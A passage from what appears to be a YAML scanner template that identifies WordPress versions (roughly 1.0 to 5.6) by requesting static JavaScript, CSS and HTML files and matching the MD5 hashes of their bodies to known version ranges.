dsl: - - "(\"9d289d837cdaabecd1fd6aeb38b366e0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/postbox.js" - matchers: - - type: dsl - name: 4.7 - 5.0.11 - dsl: - - "(\"e3dfc3b71fefc8c6eb82df54e3460b53\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"b695c5dad26818aecad696768ad1bd75\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"865e4f8df693705b404c45fddc1bd65f\" == md5(body))" - - type: dsl - name: 4.4.1 - 4.4.24 - dsl: - - "(\"99602c14980c31323b6851d0c81280fd\" == md5(body))" - - type: dsl - name: 4.4 - dsl: - - "(\"626e31e5abab7aae41a74691d1185e69\" == md5(body))" - - type: dsl - name: 4.0 - 4.3.25 - dsl: - - "(\"87a08ca86f25ee997a627ce4a88ec359\" == md5(body))" - - type: dsl - name: 3.8 - 3.9.33 - dsl: - - "(\"7d4e28e6dbd4db0ea12ca2244d3ededd\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"7ea8bff0af625f7b182f4c0ed9c5b5a6\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"3833ce43a5347b4542e8a9a2a76d3079\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"fc68948c4bc93d343b8c518d511cac08\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"a2ff73ebf42590213238b50ca66bbaca\" == md5(body))" - - type: dsl - name: 2.9 - 3.1.4 - dsl: - - "(\"7fa761c7425ce79babb4d790dcea367e\" == md5(body))" - - type: dsl - name: 2.8.1 - 2.8.6 - dsl: - - "(\"9bbabda30eba2bf23c9c9cd3b6afec1f\" == md5(body))" - - type: dsl - name: 2.8 - dsl: - - "(\"5834e331f60318d3f00b919ccf515e3a\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"7eb1fe696add412bac5e250b3e7f572c\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"8421d4a0813473667bac239989a2fc90\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"dfa3d2ab3f0caa20db92a24bcc0ff904\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"903af8df66abaa627fe19f99d04d3e7e\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"2f6fd3d7eafc412d3769897be1d35cc5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/plugin-install.js" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"b606cf2ba06353b0e383e36b4bd19a30\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"9570431e7a6293435a1592a995fcb11f\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"0329aac46a64c9a9453694353cd176b0\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"684877d319a91f3766e4474a60b99b9a\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"90585237ad358716313a1f5d9b9353b9\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"2e2deb24835a5f6c5259690d775a2324\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"6c01acc3ccd0bbdee1c9d1f31d8cb2be\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"8505a21ad5b4c96db865a6208bd0d017\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"69fdd35fdcf30104974cfd8abba8fe0b\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"45050658679cde23b3e31be7de31e526\" == md5(body))" - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"16ba1352fa10398697d8abdbeb096894\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"4622152410d656cd0384bf480521150f\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"62abb0285535502328c0cf33f5a3db63\" == md5(body))" - - type: dsl - name: 2.7.1 - dsl: - - "(\"6d35bcfe2573200a1349a95b8234c411\" == md5(body))" - - type: dsl - name: 2.7 - dsl: - - "(\"ba82272c84110566e42d32c99897b48f\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"5a56a4f83e069ec401c545d97b03c03d\" == md5(body))" - - type: dsl - name: 4.9.2 - 5.0.11 - dsl: - - "(\"111082709bd5b31ec3f6230dcbc2c453\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"0e91417b2af13f8c8dcd183146051cab\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"87f424ec96a8076fa69ed5ca77a48051\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"f85da534dfaa752cc62b3ae45eaf3a3b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/editor-expand.js" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"c7d8e24f4c208108b7caf2df88d9b54a\" == md5(body))" - - type: dsl - name: 4.6.1 - 4.6.20 - dsl: - - "(\"e7b93fd7ead47026c1becc24527031cb\" == md5(body))" - - type: dsl - name: 4.6 - dsl: - - "(\"bc3aaa870920e8272d795377983284e6\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"a83f982e5c5f7847ae809681d17982c6\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"e5803492f3d1bf76d8a84775ccc20dd6\" == md5(body))" - - type: dsl - name: 4.2.2 - 4.3.25 - dsl: - - "(\"001eee141532f8fc1fac023dbb945a92\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.1 - dsl: - - "(\"4f5ffbf8ea97f6a5399e9b4799da6b47\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"2f37f221b8f77ae0e6bbde7b8d03fe43\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.0.32 - dsl: - - "(\"d8bf6b8ad0222c5c81abe3445397afb3\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"404895c4518505935866c5eb11047c30\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"88a83136db40e8e8b93f230a6712ea54\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"8b2a23ce701d653e25093ee43c221b8a\" == md5(body))" - - type: dsl - name: 5.2 - 5.3.6 - dsl: - - "(\"beab9e6566d2ec701c27bccd8322b2c8\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"95ceb9fdb83330b51162d8db3e3a214b\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"91a417834bc4155c28b08270bda9b25b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/plugin.min.js" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"97336cf7d88da1e9c142069d76f11c23\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"13b554d6a123f78c5cb3b601c24c0e09\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"12f8cfc114d4644e0a8dcb4784a63a79\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"20c2ac6dc65464192456606dae06eae4\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"49fb4126ed9cfd4b7509019a7490acb0\" == md5(body))" - - type: dsl - name: 4.5.3 - 4.5.23 - dsl: - - "(\"1618d0c7936444db76f6676767a8d743\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.2 - dsl: - - "(\"27b3b159d15842fe85708bb9fcfee677\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"b46f4f2afbda7e481b420a8ee19c7406\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"6e47a30fdc90cb4b42de68acf864c71a\" == md5(body))" - - type: dsl - name: 4.2.2 - 4.2.29 - dsl: - - "(\"26da4266c11d1a0eea6ebf1360b815d4\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.1 - dsl: - - "(\"78f1d835b79b5db9bd86cd7cf15d22ff\" == md5(body))" - - type: dsl - name: 4.1.5 - 4.1.32 - dsl: - - "(\"890c56f7df87f0b1ecd96e2068f60dd0\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.4 - dsl: - - "(\"f7cc436db8ef131f0d0543bc729bf1b1\" == md5(body))" - - type: dsl - name: 4.0.5 - 4.0.32 - dsl: - - "(\"994a37d7ed6d3711130b74ac05f554a7\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.4 - dsl: - - "(\"2e75ba1f0636242ddc242c5043816052\" == md5(body))" - - type: dsl - name: 3.9.6 - 3.9.33 - dsl: - - "(\"b81c1479c74443d87373adb8f83ccb33\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.5 - dsl: - - "(\"d0fde0102413e2b4a5b7922569391ecb\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"6319d1ae71068739dc713d26fd7da312\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.7 - dsl: - - "(\"3f6ceb77ea8c1b75b748179215519ec5\" == md5(body))" - - type: dsl - name: 4.9.8 - 4.9.16 - dsl: - - "(\"40b2c5a72f36fa6375bdb67e26ea8b4d\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"b7d6f9102a09ce8f774d7cf359a70db3\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"2c8e94e3d93ccbf91a114e3bd34b0aca\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"7a3c939a198ba5e0ac4145a731f17127\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"e9bdf549df031fe6b583e818dac7e4fd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-layout.css" - matchers: - - type: dsl - name: 1.2-mingus - 1.2.2 - dsl: - - "(\"3eb56f763814712c192902a8c48b0c23\" == md5(body))" - - type: dsl - name: 1.2.1 - dsl: - - "(\"7140e06c00ed03d2bb3dad7672557510\" == md5(body))" - - type: dsl - name: 1.2-delta - dsl: - - "(\"1bcc9253506c067eb130c9fc4f211a2f\" == md5(body))" - - type: dsl - name: 1.0-platinum - 1.0.2 - dsl: - - "(\"30bb4eebd20e27e399dbb8a5106d52e7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/dashboard.dev.css" - matchers: - - type: dsl - name: 3.2.1 - dsl: - - "(\"fd95127ba19547f5e4bd54307ea401e5\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"a8b2505542267a8315fb283bd5073dcc\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"c403505339df2ef6bb916674e6bcb267\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"88e52fb011e57e6c3c8d95f8009531f3\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"f741cc75faba09aa2f7e0b628e2b2b2a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/global-rtl.dev.css" - matchers: - - type: dsl - name: 3.2.1 - dsl: - - "(\"e8cafb493fccd3a14877aecbabea22bb\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"a2741e62a5cc2bd28d8346c004eba7bd\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"c1d3b68a32d1c6dbed770377865764ee\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/press-this.dev.css" - matchers: - - type: dsl - name: 3.2.1 - dsl: - - "(\"61db67d7f5c655ce5176dc6204415e5d\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"ffdc847cfa0a6dc1ee2df38a53c28bd2\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"4ed3a64ed29775c1ad595f289a68736d\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"b720cd428c4af7aa2eb2544184cb166c\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"eceb5757d946022c22cbecf1b48643ca\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/login.dev.css" - matchers: - - type: dsl - name: 3.2.1 - dsl: - - "(\"1d28a5b5ee8474f5f07e9bf15a4cc49a\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"2b2e425ed02d774f5fc008f71b141d08\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"941cf7af3623be120885691b0a57ec07\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"49553c264b4bf194f17112e1e7f08a70\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"ddfa3c98b711770b07844a19dc6a9bed\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/blank.htm" - matchers: - - type: dsl - name: 2.8 - 3.3.3 - dsl: - - "(\"5dbbcbc1f4bcbe5fe9f22905a7838b57\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"e176e3f6f068f68640de4406478ea37b\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"b8e395746dadd82553f7e05d94773218\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"f5dd51facba3214e941d12247feae2d0\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"88783f6e539184616896268bca04c25e\" == md5(body))" - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"c071fad481334f6b06d4bb55bc76c2fe\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/wp-admin-rtl.dev.css" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"430f5376bd650ad0d75e1787e7e75314\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"8a365e61385d019a68dded6919e9c0a3\" == md5(body))" - - type: dsl - name: 3.2.1 - dsl: - - "(\"9a959ab5f438970e3ff6b81b14e2351e\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"c5403fa2bb45c8eb102e4e958c5ab1fd\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"c5a3ecbfc6a9f60214435ec893017a19\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"55577eddb6e3a2202771c05ed26119a3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/install.dev.css" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"809806c9cea0cd14d38a25340315c89c\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"c44ed273034db1588c715a236235a24e\" == md5(body))" - - type: dsl - name: 3.2.1 - dsl: - - "(\"c0e587488b912245dbc1fe87fd58375d\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"eed157f75067e0523c72267c8a1718a9\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"69ef93c7c6205b765fe37ea39dcb3c11\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"a5c83eec566f3e926cb8b94f22097932\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"0380e33272aa60d16b2e7d405e7288a8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/media.dev.css" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"aa77cf5c3eb6ddabf49afe6742509b5b\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"a5ca39c7ff5b120c1f8b3030bfc72a66\" == md5(body))" - - type: dsl - name: 3.2.1 - dsl: - - "(\"f9755a2abfe8ebdf14ae665d4e64f25b\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"7b2de212dde19888dc191e7ba40c967e\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"3022f5720f96991c5279819e4ccd9db6\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"02de355bba3fdcecdd38a8ebe1a2d9d9\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"5317f5da30c076dac3987e5b56813920\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/common.dev.js" - matchers: - - type: dsl - name: 3.4.1 - 3.4.2 - dsl: - - "(\"6cad1cbac77651c7e35bf55210e28d3e\" == md5(body))" - - type: dsl - name: 3.4 - dsl: - - "(\"d50cb86c0c59bddf298adc39d6a41f60\" == md5(body))" - - type: dsl - name: 3.3.1 - 3.3.3 - dsl: - - "(\"2ede6e863d4ef607c8e6af1cb77fec2b\" == md5(body))" - - type: dsl - name: 3.3 - dsl: - - "(\"15668f1c67a3fdb80cf021e231c085d8\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"58213695ac22fbc3c2f6e159e2448b46\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"aeb8ffae99a8f3964c9c0ca140746afa\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"6fe3a82e70ceb1449146e3983fff91ac\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"60ad751677c87b314023944364431b13\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"b3006945c3b8408f9c889b6aa6d28e44\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/wp-fullscreen.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"223fc3c5b7e5c2ae8abe9879ba07dda5\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"549c843c51999ff7afb8ce4c4e36a253\" == md5(body))" - - type: dsl - name: 3.2.1 - dsl: - - "(\"70d51eecfd8d02a5f538c3be731fdedd\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"ff1fafac6a69b8ebced1965e18e39b4a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/post.dev.js" - matchers: - - type: dsl - name: 3.4.2 - dsl: - - "(\"b7f14147f98e067f4c2df1cba298fd1a\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.1 - dsl: - - "(\"c2ba4c3bc967522600340dfdcbc43ba8\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"a56486988bfc38afea319ac5eef68319\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"9a167e3d4423d210de6d92a7695a0ec3\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"1ec85e4fa152f77e087102225304d588\" == md5(body))" - - type: dsl - name: 3.0.5 - 3.0.6 - dsl: - - "(\"580e3d6a8e88257b921a534c26560007\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.4 - dsl: - - "(\"73299ae2e6e8681b5eb9949706dcbb34\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"3c69319888144b5904c10ad64b999972\" == md5(body))" - - type: dsl - name: 2.8.1 - 2.8.6 - dsl: - - "(\"4758b37ba0588d0100bfad9ea7557bf9\" == md5(body))" - - type: dsl - name: 2.8 - dsl: - - "(\"392cf5bd0d18d352cf7e8178d5870be0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/link.htm" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"73d4ffe078d60f5d63452e2c3e95182b\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"9953ab56d24df2c43e7591217d779dd3\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"bdae891eeba96b0585eb0d978699e605\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"4864f8eb687dabbff4cd9d8ecba8c712\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"9406f7c7c89bbc67a698389c124e2bcd\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"f8cb995525a428d3df2a44799900f2f7\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"86603ac86e519d4d65fe077fb4d8d0be\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"9a7dca501ff7b62ada027341cd7a397b\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"6e15e3be35cdb751d367f1dc8be34cf1\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"c151d8e1c8463b8589921ae9892952a7\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"60fb3a31220b50974228b898d13bfde4\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"f4cbb390a6cc806a6f888009696800d5\" == md5(body))" - - type: dsl - name: 2.1 - 2.2.3 - dsl: - - "(\"45ca8fb38d196c8b814490a71fa2f85a\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"a271bba6f7c066798d2c114a56fb21ec\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/content.css" - matchers: - - type: dsl - name: 3.4 - 3.8.35 - dsl: - - "(\"15f8ca03ff46bc3c16562a95209ae0bb\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"16c6bfc29480dd1a2a3c6b51b114a265\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"39a1f5027797e7dd27e2d91d26238fde\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"81929c113470c66349b5086c6c7c9af0\" == md5(body))" - - type: dsl - name: 2.6 - 3.0.6 - dsl: - - "(\"2f921f2c07fa24953530b23bf2000e0a\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"a4af9e6f7f306b7f4d39a7f59ca11df6\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"a47375f8211aceb57d7e67e04b491007\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/content.css" - matchers: - - type: dsl - name: 3.4 - 3.8.35 - dsl: - - "(\"07708a7c49751ba1f9389079a56f2c91\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"5274a3388475f362aba65bee56b7e411\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"1b6df3b8b3edd3090ef2011ced0f9ac7\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"8e5284aa00887f6021be94410dce6ee3\" == md5(body))" - - type: dsl - name: 2.6 - 3.0.6 - dsl: - - "(\"4a0a94603795b7bfc41ff76ea8889db7\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"c15313eca2138543d9f4e5b8407b496c\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"eb01e343c4903eb57aa0ab0afa7e20d8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/about.htm" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"742d8c3e934a99a6b55ddc1f9f0eb71d\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"50218b28d236faa546d606dd90c2ed2f\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"41d67913c326587ac7f2090fb74f5319\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"90787383a6434187195dd40aa95d237a\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"11a6f93926ee36c97ee508c50fbb2e8d\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"ba3007568a4487475949ac2ace24604d\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"7e80709c52260a0022f7f336b72cd71b\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"6d3c5cbc4021ae8df64a1fe3e7040b11\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"883daf4c2686b667cdf5d0ee58368a47\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"04045286f214bd0e5f556f393301dd7e\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"2102cad8b48c2e05fa8ec2fd6be6c7e9\" == md5(body))" - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"64c9568b29bc06652f9ece85691ecb1f\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"f33f7fa8ff16f5ea67777719e51ea349\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"2c9c1f6943a7b7a42b6e0aef5130f6db\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/anchor.htm" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"d39a84bbf89e1dbc300f44d4c6eff520\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"0df79f28cd97ce273b7ee98f40deee20\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"e013e73a9ff93156080ab087eb5cf69b\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"3f89e79d6c5aed7408b4132a520f5a66\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"702e8eda7a729cb67e6c8dd28adbaa01\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"7d6b77bd3ac2520fb484c7bac27922bb\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"b84f177905e368a80d9a25e728182794\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"e44a7c747828cc6698fc07842f1f2d1b\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"f427c67e07e8f6a7df8c8af1961daec6\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"f8e8fc869fa2768176d5c458eece8c4a\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"fd990e3a5b37af121d77d30b75fc8f2b\" == md5(body))" - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"fcdc4522e42d5e4eb46a43ba771a16c0\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"2d6479966b6e403561858a3aa2404a33\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/source_editor.htm" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"f7dcaeb5cc281bdecf6330ca986fa439\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"abc891ffe0a1920e7dda4845e1ed5973\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"ead9f98478f78b005bc67cd2a49613b3\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"8e0c1bef01e1a98388d141c53a05848b\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"6268293d96f5baa48db1f2a54b657d76\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"541099ed16670e5299df3e6ecf61e7fa\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"4b5f5a3e7846a30fe9dcb878f9e8f2cb\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"7dca75fdff97de1cc2702c1782952605\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"c190bbe830b5985cb2c264ab8fae46b5\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"4728edfe58fc5b781c4fc2e1f90e0bb2\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"f02303f69ff29bcd11411b40ac2147e7\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"b5848d93559f1f58ca28eb10a63df54d\" == md5(body))" - - type: dsl - name: 2.1 - 2.2.3 - dsl: - - "(\"1b6d02c486a9c4c1e47b9cda373e18a9\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"6c74ba36d1e5d571adcf8247f5e29ab4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/color_picker.htm" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"7fccf0616c87a689f089433a68141979\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"f3105897d46f25ee0de51b86d702757a\" == md5(body))" - - 